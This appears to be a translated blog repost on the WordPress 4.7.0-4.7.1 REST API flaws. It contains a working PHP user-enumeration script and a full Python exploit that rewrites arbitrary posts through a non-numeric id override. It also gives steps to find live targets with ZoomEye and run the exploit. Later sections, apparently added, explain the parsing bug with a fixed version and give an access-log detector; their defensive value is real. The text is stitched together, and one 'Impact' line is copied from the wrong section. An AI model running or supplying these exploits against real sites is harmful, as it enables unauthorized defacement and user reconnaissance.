Research on the WordPress 4.7.0-4.7.1 content injection vulnerability
Source: Internet  Published by: Alibaba Cloud SSL certificate purchase  Editor: 程序博客网  Time: 2024/06/05 13:32
1. Retrieving users
1. Impact: unauthenticated retrieval of the usernames and IDs of other users who have published posts
2. Precondition: the WordPress site has the REST API enabled
3. Affected versions: <= 4.7
4. Vulnerability description: a plain GET request, without any further work, passes the logic check in wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php, which returns true; the code goes on to run the query, and the REST API returns the result as JSON to the client, exposing some user information. Request URL: http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/
5. Exploit:
```php
<?php
# Author: Mateus a.k.a Dctor
# fb: fb.com/hatbashbr/
# E-mail: dctoralves@protonmail.ch
# Site: https://mateuslino.tk
header('Content-type: text/html; charset=UTF-8');
$url = "http://xxxx.cn/";
$payload = "wp-json/wp/v2/users/";
// fetch the public users listing and decode the JSON array it returns
$urli = file_get_contents($url . $payload);
$json = json_decode($urli, true);
if ($json) {
    echo "*-----------------------------*\n";
    foreach ($json as $users) {
        echo "[*] ID : |" . $users['id'] . "|\n";
        echo "[*] Name: |" . $users['name'] . "|\n";
        echo "[*] User :|" . $users['slug'] . "|\n";
        echo "\n";
    }
    echo "*-----------------------------*";
} else {
    echo "[*] No user";
}
?>
```
6. Result:
2. Modifying arbitrary posts without authentication
1. Impact: unauthenticated retrieval of the usernames and IDs of other users who have published posts
2. Precondition: the WordPress site has the REST API enabled
3. Affected versions: WordPress 4.7.0-4.7.1
4. Vulnerability description: because of a flaw in the REST API exposed by the server, every WordPress post can be viewed, modified and deleted, and new posts can even be created, without any authentication.
5. Exploit:
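To make the logic flaw concrete, here is a small Python model I have added; it is not code from the original post and not WordPress code. It assumes the root cause as publicly described for 4.7.0/4.7.1: the route regex only accepts digits, but a query-string `id` overrides the route value; the permission check looks the post up with a strict numeric test (a value such as `1abc` yields no post, so the "may the caller edit this post?" branch is skipped), while the update itself casts the id with PHP's `(int)`, which turns `1abc` into 1. The `POSTS` store, the `php_is_numeric`/`php_int_cast` helpers and `update_fixed` are my own constructions; the fix shows the general remedy, which is to canonicalise the identifier once and use that one value for both the check and the action.

```python
# Added example: model of an authorization check and its action parsing the
# same identifier differently (constructed, simplified; not WordPress code).
import re

# Constructed sample post store and caller context: the caller is not allowed
# to edit anything, so every honest update must be refused.
POSTS = {1: {"content": "hello"}, 2: {"content": "world"}}
CURRENT_USER_CAN_EDIT = False


def php_is_numeric(value):
    """Approximates PHP is_numeric(): the whole string must be a number."""
    pattern = r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"
    return re.fullmatch(pattern, value) is not None


def php_int_cast(value):
    """Approximates PHP (int) on a string: leading digits count, the rest is ignored."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def get_post_strict(raw_id):
    # Lookup used by the vulnerable permission check: a non-numeric id simply
    # yields "no post" rather than an error.
    if not php_is_numeric(raw_id):
        return None
    return POSTS.get(int(float(raw_id)))


def update_vulnerable(raw_id, new_content):
    """Check and action disagree on what raw_id means."""
    post = get_post_strict(raw_id)
    if post is not None and not CURRENT_USER_CAN_EDIT:
        return "forbidden"          # only reached when the strict lookup found a post
    post_id = php_int_cast(raw_id)  # '1abc' -> 1: a different post than the check saw
    if post_id in POSTS:
        POSTS[post_id]["content"] = new_content
        return "updated"
    return "not found"


def update_fixed(raw_id, new_content):
    """Canonicalise once, reject anything that is not a positive integer,
    then use the same value for the permission check and the update."""
    if not re.fullmatch(r"\d+", raw_id) or int(raw_id) <= 0:
        return "invalid id"
    post_id = int(raw_id)
    post = POSTS.get(post_id)
    if post is None:
        return "not found"
    if not CURRENT_USER_CAN_EDIT:
        return "forbidden"
    post["content"] = new_content
    return "updated"


if __name__ == "__main__":
    print("vulnerable, id='1'   :", update_vulnerable("1", "x"))
    print("vulnerable, id='1abc':", update_vulnerable("1abc", "x"))
    print("fixed,      id='1abc':", update_fixed("1abc", "y"))
    print("fixed,      id='2'   :", update_fixed("2", "y"))
```

The lesson is not specific to WordPress: whenever an identifier is parsed in two places, the authorization decision and the privileged action can end up talking about two different objects. Parse and validate once, at the boundary, and pass the canonical value onward.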
```python
import json
import sys
import urllib.request
from lxml import etree


def get_api_url(wordpress_url):
    # the REST API root is advertised in the <link rel="https://api.w.org/"> tag
    response = urllib.request.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u


def get_posts(api_base):
    response = urllib.request.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())
    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({'content': post_content}).encode('utf-8')
    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib.request.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib.request.urlopen(req).read()
    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':
    # ensure we have at least a url
    # if we have a post id, we need content too
    if len(sys.argv) < 2 or len(sys.argv) == 3:
        print_usage()
        sys.exit(1)
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {0}'.format(api_url))
    # if we only have a url, show the posts we have
    if len(sys.argv) == 2:
        get_posts(api_url)
        sys.exit(0)
    # if we get here, we have what we need to update a post!
    print('* Updating post {0}'.format(sys.argv[2]))
    # the new post body is read from the content file named on the command line
    with open(sys.argv[3], 'r') as content:
        new_content = content.read()
    update_post(api_url, sys.argv[2], new_content)
    print('* Update complete!')
```
6. Vulnerability test:
6.1 First find a test target using ZoomEye
6.2 Note: create a file named content in the same directory as test.py and put the replacement post content in it.
Run the script: python test.py url 1 content (the url is the attack target and is not given here)
PS: this script is best run on Linux; on Windows it needs some changes.
7. Final result screenshot
8. Remediation: upgrade to the latest version of WordPress
9. Summary: unauthenticated operations caused by API flaws deserve attention, and future vulnerability research should pay more attention to this class of bug. As for the code, from a quick look the unauthenticated operation is mainly the result of a logic error in the programmer's code.
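Both issues above leave clear traces in ordinary web server access logs: the user listing shows up as hits on the `wp/v2/users` route, and the post override shows up as a write to `wp/v2/posts/<digits>` that carries an `id` query parameter which is not a plain integer. The following scanner is an added example of mine (not code from the original post) that flags both patterns in combined-format log lines; the `SAMPLE_LOG` entries, IP addresses and user agents are constructed for the demonstration. It also handles the `?rest_route=` form the REST API uses when permalinks are disabled, which the original script warns about.

```python
# Added example: flag REST API user enumeration and post-id override attempts
# in combined-format access logs (constructed sample data).
import re
from urllib.parse import urlsplit, parse_qs

# host ident user [timestamp] "METHOD target PROTOCOL" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
POST_ITEM_RE = re.compile(r'^/wp-json/wp/v2/posts/(?P<route_id>\d+)/?$')
WRITE_METHODS = ('POST', 'PUT', 'PATCH', 'DELETE')


def analyse_request(method, target):
    """Return (severity, reason) for a suspicious request, or None."""
    parts = urlsplit(target)
    path = parts.path
    query = parse_qs(parts.query)
    # without permalinks the route travels in the query string instead of the path
    if 'rest_route' in query:
        path = '/wp-json' + query['rest_route'][0]
    if path.rstrip('/') == '/wp-json/wp/v2/users' or path.startswith('/wp-json/wp/v2/users/'):
        return ('medium', 'user enumeration via the REST users endpoint')
    m = POST_ITEM_RE.match(path)
    if m and method in WRITE_METHODS:
        for raw in query.get('id', []):
            # the route already fixed the id to digits; a non-integer query id
            # only makes sense as an attempt to override it
            if not re.fullmatch(r'\d+', raw):
                return ('high', 'post id override with non-numeric id query param: %r' % raw)
    return None


def scan_log(lines):
    """Parse each log line and collect (ip, method, target, severity, reason) findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hit = analyse_request(m.group('method'), m.group('target'))
        if hit:
            findings.append((m.group('ip'), m.group('method'), m.group('target'), hit[0], hit[1]))
    return findings


# Constructed sample log lines (documentation-range IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2017:12:00:01 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 512 "-" "curl/7.50"',
    '203.0.113.5 - - [10/Feb/2017:12:00:03 +0000] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 1034 "-" "python-urllib/3.6"',
    '198.51.100.7 - - [10/Feb/2017:12:00:05 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Feb/2017:12:00:09 +0000] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 401 97 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Feb/2017:12:01:00 +0000] "POST /?rest_route=/wp/v2/posts/2&id=2x HTTP/1.1" 200 900 "-" "curl/7.50"',
]

if __name__ == '__main__':
    for ip, method, target, severity, reason in scan_log(SAMPLE_LOG):
        print('[%s] %s %s %s: %s' % (severity.upper(), ip, method, target, reason))
```

A public `GET` on the posts collection and an authenticated-looking write with no override parameter are left alone, so the rule stays quiet on normal editor traffic. On an already patched site the `high` finding is still worth alerting on, since it identifies a client that is specifically probing for this bug.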